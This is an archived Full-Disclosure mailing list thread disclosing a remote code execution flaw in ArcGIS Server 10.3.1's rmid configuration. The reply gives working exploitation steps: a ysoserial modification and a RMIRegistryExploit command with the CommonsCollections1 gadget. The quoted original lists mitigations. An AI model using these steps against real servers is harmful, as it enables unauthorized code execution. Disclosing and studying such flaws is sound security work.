lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <CA+i6_hXDZ71SO4Snt=J7f3y8en6_XO0er+KbvX-_O5dK+nwGLA@mail.gmail.com>
Date: Mon, 09 Oct 2017 08:10:02 +0000
From: Harrison Neal <hneal@...tdidibreak.com>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: Re: [FD] ArcGIS Server 10.3.1: RMIClassLoader useCodebaseOnly=false
	RCE

After playing with this for a few more hours, it turns out that you don't
need the victim to be able to reach an attacker-controlled web server if
you can take advantage of gadgets already present on the victim server.

For example, on the Azure Marketplace image for ArcGIS Server 10.3.1, there
are copies of several out-of-date libraries that the ysoserial project
targets.

Link: https://github.com/frohoff/ysoserial

You'll want to add lines similar to the following to the beginning of the
main method of ysoserial.exploit.RMIRegistryExploit, and then recompile:

System.setProperty("java.rmi.server.codebase",
"file:///C:/ArcGIS/Server/geronimo/repository/commons-collections/commons-collections/3.2/commons-collections-3.2.jar");
System.setProperty("java.rmi.server.useCodebaseOnly", "false");

This will have ysoserial suggest to rmid on the victim server where it can
load vulnerable copies of the Apache Commons Collections classes from.
Then, you simply exploit the remote server with something like:

java.exe -cp ysoserial-0.0.6-SNAPSHOT-all.jar
ysoserial.exploit.RMIRegistryExploit 10.x.y.z 1098 CommonsCollections1 calc

And you should notice calc running as a child process of rmid on the victim
server, without having required the victim server contact some other web
server.  That said, this is based on the image in Azure Marketplace; your
mileage on other systems may vary.

On Sun, Oct 8, 2017 at 10:16 PM Harrison Neal <hneal@...tdidibreak.com>
wrote:

> Using an Esri-provided image on Azure's Marketplace, ArcGIS Server 10.3.1
> started Java's rmid on port 1098 and explicitly set the
> property java.rmi.server.useCodebaseOnly equal to false.
>
> Screenshot:
> https://www.dropbox.com/s/xz9ugal3ixnfh1c/10.3.1_rmid_useCodebaseOnly%3Dfalse.png?dl=0
>
> As discussed on Oracle's website, the default value of
> java.rmi.server.useCodebaseOnly was changed to true in Java 7 Update 21,
> with a remark that setting it to false could create a risk of RCE.
>
> Link:
> http://docs.oracle.com/javase/7/docs/technotes/guides/rmi/enhancements-7.html
>
> While the version of Java included in ArcGIS Server 10.3.1 appears to be
> Java 7 Update 76, which would have the more secure default setting, that is
> irrelevant due to the ArcGIS solution manually changing it.
>
> Screenshot:
> https://www.dropbox.com/s/5reh81dwwp9e4dz/10.3.1_rmid_java7u76.png?dl=0
>
> When an attacker can remotely reach rmid on the victim server, and the
> victim server can reach a web server on a machine controlled by the
> attacker, this is relatively easily exploited to gain RCE.
>
> Video:
> https://www.dropbox.com/s/t4fmxwzjzzo7yhe/ArcGIS_useCodebaseOnly%3Dfalse_exploitation.wmv?dl=0
>
> Administrators are encouraged to use a tool such as Process Explorer or
> wmic to ensure that the command line arguments passed to rmid have the
> java.rmi.server.useCodebaseOnly property equal to true.
>
> During testing, Esri-provided images on Azure's Marketplace for ArcGIS
> Server 10.4.1 and 10.5.1 were found to set that property to true;
> administrators may try updating to a newer version of ArcGIS Server, and/or
> contacting Esri for assistance.
>
> If an update is required but not immediately possible, consider firewall
> rules to block access to rmid from systems that have no need to connect to
> it.
>

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ